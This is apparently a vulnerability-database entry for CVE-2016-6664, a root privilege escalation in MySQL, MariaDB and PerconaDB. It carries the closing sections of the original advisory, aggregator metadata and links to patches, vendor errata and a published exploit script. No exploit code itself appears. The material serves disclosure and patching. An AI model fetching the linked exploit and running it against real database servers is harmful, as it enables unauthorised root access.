http://legalhackers.com This advisory: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Exploit source code: http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh Related mysql vulnerabilities discovered by the author of thid advisory that can be chained with the CVE-2016-6664 vulnerability: CVE-2016-6663: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html CVE-2016-6662: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html CVE-2016-6664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 Oracle CPU: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. id SSV:92513 last seen 2017-11-19 modified 2016-11-02 published 2016-11-02 reporter Root source https://www.seebug.org/vuldb/ssvid-92513 title MySQL / MariaDB / PerconaDB elevation of privilege vulnerability, CVE-2016-6664)
The Hacker News
id | THN:527125445EE758FC7D6A33333D6500EB |
last seen | 2018-01-27 |
modified | 2016-11-06 |
published | 2016-11-02 |
reporter | Swati Khandelwal |
source | https://thehackernews.com/2016/11/mysql-zero-day-exploits.html |
title | Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released) |
References
- http://seclists.org/fulldisclosure/2016/Nov/4
- http://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html
- https://www.percona.com/blog/2016/11/02/percona-responds-to-cve-2016-6663-and-cve-2016-6664/
- http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
- https://www.exploit-db.com/exploits/40679/
- http://www.securityfocus.com/bid/93612
- http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
- https://security.gentoo.org/glsa/201702-18
- http://www.debian.org/security/2017/dsa-3770
- https://access.redhat.com/errata/RHSA-2017:2192
- http://rhn.redhat.com/errata/RHSA-2016-2749.html
- http://rhn.redhat.com/errata/RHSA-2016-2130.html
- https://access.redhat.com/errata/RHSA-2018:0279
- https://access.redhat.com/errata/RHSA-2018:0574
- http://www.securityfocus.com/archive/1/539695/100/0/threaded